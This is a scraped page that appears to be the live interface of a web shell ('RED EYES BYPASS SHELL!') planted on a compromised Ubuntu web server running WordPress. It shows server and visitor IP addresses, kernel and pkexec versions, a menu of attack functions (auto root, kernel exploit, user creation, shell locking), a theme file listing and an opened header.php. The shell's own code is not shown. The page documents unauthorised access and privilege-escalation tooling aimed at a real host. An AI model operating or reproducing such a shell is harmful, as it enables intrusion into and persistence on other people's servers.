Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
build
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
896
B
-rwxr-xr-x
archive.php
1.26
KB
-rwxr-xr-x
comments.php
1.62
KB
-rwxr-xr-x
footer.php
1009
B
-rwxr-xr-x
front-page.php
600
B
-rwxr-xr-x
functions.php
2.3
KB
-rwxr-xr-x
header.php
1.18
KB
-rwxr-xr-x
index.php
1.37
KB
-rwxr-xr-x
page.php
933
B
-rwxr-xr-x
readme.txt
11.18
KB
-rwxr-xr-x
rtl.css
24.5
KB
-rwxr-xr-x
screenshot.png
198.97
KB
-rwxr-xr-x
search.php
1.25
KB
-rwxr-xr-x
sidebar.php
449
B
-rwxr-xr-x
single-blossom-portfolio.php
2.29
KB
-rwxr-xr-x
single.php
955
B
-rwxr-xr-x
style.css
176.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Blossom_Spa */ /** * Doctype Hook * * @hooked blossom_spa_doctype */ do_action( 'blossom_spa_doctype' ); ?> <head itemscope itemtype="http://schema.org/WebSite"> <?php /** * Before wp_head * * @hooked blossom_spa_head */ do_action( 'blossom_spa_before_wp_head' ); wp_head(); ?> </head> <body <?php body_class(); ?> itemscope itemtype="http://schema.org/WebPage"> <?php wp_body_open(); /** * Before Header * * @hooked blossom_spa_page_start - 20 */ do_action( 'blossom_spa_before_header' ); /** * Header * * @hooked blossom_spa_responsive_nav - 10 * @hooked blossom_spa_header - 20 */ do_action( 'blossom_spa_header' ); /** * Content * * @hooked blossom_spa_content_start */ do_action( 'blossom_spa_content' );
Close